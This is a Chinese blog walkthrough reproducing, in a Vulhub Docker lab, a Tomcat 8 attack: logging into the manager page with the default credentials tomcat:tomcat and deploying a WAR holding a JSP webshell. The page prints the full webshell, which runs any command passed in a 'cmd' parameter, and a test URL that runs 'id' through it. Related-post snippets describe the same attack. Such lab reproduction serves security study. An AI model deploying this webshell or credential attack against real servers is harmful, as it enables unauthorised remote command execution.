Tomcat8 + 弱口令 && 后台getshell 漏洞复现

最新推荐文章于 2024-06-27 14:01:14 发布
最新推荐文章于 2024-06-27 14:01:14 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: 漏洞复现 文章标签: Tomcat8 + 弱口令 && 后台getshell 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jerry____/article/details/103387763
版权
一:搭建环境

1、利用vulhub搭建环境,进入相关漏洞目录下

cd /vulhub/tomcat/tomcat8

2、一键安装环境

docker-compose up -d
二:漏洞利用

1、打开http://your-ip:8080/manager/html,输入弱密码tomcat:tomcat。
2、制作木马文件,首先准备一个ma.jsp木马,压缩成ma.zip,再修改后缀名为ma.war。
ma.jsp

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

3、上传木马文件。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传成功。
4、访问:http://192.168.33.137:8080/ma/ma.jsp?pwd=admin&cmd=id
在这里插入图片描述
成功执行cmd命令。

Jerry____
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat管理页面弱口令页面Getshell
谢公子的博客
05-22 6755
目录 弱口令Getshell 利用Burpsuite对tomcat账号密码进行爆破 弱口令Getshell Tomcat安装完成后会有如下页面,点击该页面的 Manager App 处会弹出输入用户名和密码的认证框。我们也可以直接访问:http://127.0.0.1:8080/manager/html 来访问该管理页面 此时,需要我们输入用户名和密码进行登录。我们可以尝试一...
vulhub Tomcat8漏洞复现
weixin_51441054的博客
03-22 6295
vulhub Tomcat8漏洞复现 搭建一下Tomcat8这个漏洞的环境 查看端口发现是8080端口开放 可以看到环境已经搭建好了 尝试登录问题页面,发现需要输入密码http://...:8080/manager/html 用msf 得到弱口令 成功登入后台 此处可上传文件,尝试上传webshell 上传jsp一句话木马,打包为war格式 上传出现报错,40...
16.Tomcat弱口令 && 后台getshell漏洞
weixin_30611509的博客
11-01 387
Tomcat7+ 弱口令 &amp;&amp; 后台getshell漏洞 Tomcat版本:8.0 环境说明 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看...
Vulhub - Tomcat8 + 弱口令 && 后台getshell 漏洞复现
多崎巡礼的博客
11-08 7354
VulHubTomcat8+ 弱口令 &amp;amp;amp;amp;&amp;amp;amp;amp; 后台getshell 漏洞环境实验 1.启动docker镜像 docker基于Ubuntu 已搭建完成。 拉取项目git clone https://github.com/vulhub/vulhub.git 进入镜像:cd vulhub/tomcat/tomcat8/ 启动环境:docker-compose up -d 2.登录tomca...
漏洞复现】FastAdmin——lang——任意文件读取漏洞
LongL_GuYu的博客
06-27 1186
FastAdmin是一个免费开源的后台管理框架,其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>
thelostworld
08-25 279
操作流程(环境搭建-实践操作)在linux虚拟机上安装jdk新创建linux虚拟机通过mobaxterm连接虚拟机导入tomcat安装包与jdk安装包apache-tomcat-7.0.92.tarjdk-8u201-linux-x64.tar.gz查询环境中是否存在javayum list installed |grep java创建jdk的路径 /usr/java/mkdir /usr/jav...
vulhub之tomcat弱口令+部署war包GetShell
lionwerson的博客
04-04 588
1.拉取靶场镜像,打开靶场 2.登陆抓包进行爆破,设置一个位置,然后选择类型为custom iterator,然后在下面payload选项中选择三个位置,然后增加编码的方式,最后一定要取消勾选,在选项最下面的url编码特殊字符,否则就算爆出了弱口令也无法显示成功。 如果勾选了url编码特殊字符就会让生成的base64编码的结尾的等号被url编码,即使看到的payload正确,但是请求不正确,所以显示不成功。 密码是tomcat,用户名也是。 3.进入后台上传文件,然后getshel.
cent 8.0 安装tomcat 9.0_tomcat反序列化漏洞(cve-2016-8735)
weixin_39604478的博客
11-25 299
原创: free雅轩 合天智汇 复现起源:近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。在这里感谢公司Bearcat师傅和残忆师傅以及李师傅等指导和共享精神。今天我们来一起复现一下Tomcat多版本远程代码执行CVE-2016-8735。复现...
Tomcat弱口令扫描的工具.zip
03-31
Tomcat弱口令扫描工具,可自己写字典进行爆破。
tomcat8+memcached session共享
06-11
标题中的“tomcat8+memcached session共享”指的是在Tomcat 8服务器中利用Memcached进行session共享的技术实践。在分布式系统中,session共享是一个重要的问题,因为用户在访问不同的服务器节点时,需要保持登录状态...
apache-tomcat-8.0.46.zip
09-01
apache-tomcat-8.0.46 Linux版本 tomcat8含有AJP漏洞的版本,可以用于漏洞测试。
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破。
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具
07-01
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具解压缩密码: vip2008
Nginx++Keepalived+Tomcat负载均衡&amp;动静分离
07-30
Nginx++Keepalived+Tomcat负载均衡&amp;动静分离配置 本文主要介绍了Nginx、Keepalived和Tomcat的负载均衡和动静分离配置,旨在帮助读者了解如何搭建高可用、高性能的Web应用系统。 一、环境准备 在开始配置之前,...
Apache Tomcat后台弱口令扫描
12-11
Apache Tomcat后台弱口令扫描
jdk8+tomcat9.rar
07-05
标题“jdk8+tomcat9.rar”表明这是一个包含Java Development Kit (JDK) 8和Apache Tomcat 9服务器的压缩文件。这个压缩包可能是为了方便用户在同一环境中快速搭建Java Web开发和运行平台。 JDK8是Java编程语言的一...
Tomcat弱口令漏洞
qq_43665434的博客
05-16 1902
Tomcat弱口令漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 kali msf生成木马,接收shell 192.168.1.128 windows10 攻击机 192.168.1.120 实验流程 开启漏洞靶机centos8 # 开启docker服务 service docker start # 切换到vulhub目录 cd /usr/sbin/vulhub/tomcat/tomcat8 # 创建镜像 docker
Tomcat任意文件上传CVE-2017-12615漏洞JSP利用脚本
zhlhely的博客
09-27 583
#! -*- coding:utf-8 -*- import requests import sys body = ''' <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try...
tomcat弱口令登入后台漏洞复现
最新发布
07-13
Tomcat弱口令漏洞通常指的是服务器未正确配置导致管理员账户使用了默认或过于简单的密码,容易被攻击者利用来进行未经授权的访问。复现这种漏洞通常需要以下步骤: 1. **查找漏洞信息**:首先确认该Tomcat版本是否存在已知的弱口令漏洞,这通常可以在安全公告、官方文档或漏洞数据库(如CVE)中找到。 2. **目标环境设置**:确定你的目标Tomcat服务器的IP地址、端口号以及默认管理界面路径(通常是`http://<ip>:8080/manager/html`),同时检查用户名和密码是否可以用默认值(如admin或空白)尝试登录。 3. **尝试登录**:使用工具(如burp suite、nmap等)或直接浏览器输入上述信息进行登录,如果使用的是默认或弱密码,可能会成功登录。 4. **验证漏洞**:登录后查看权限,如能够修改配置文件或管理系统,就说明可能存在弱口令漏洞。 5. **修复措施**:一旦确认漏洞存在,应立即更改管理员密码,并确保设置复杂的密码策略,禁用默认用户,或者安装安全补丁以防止此类漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值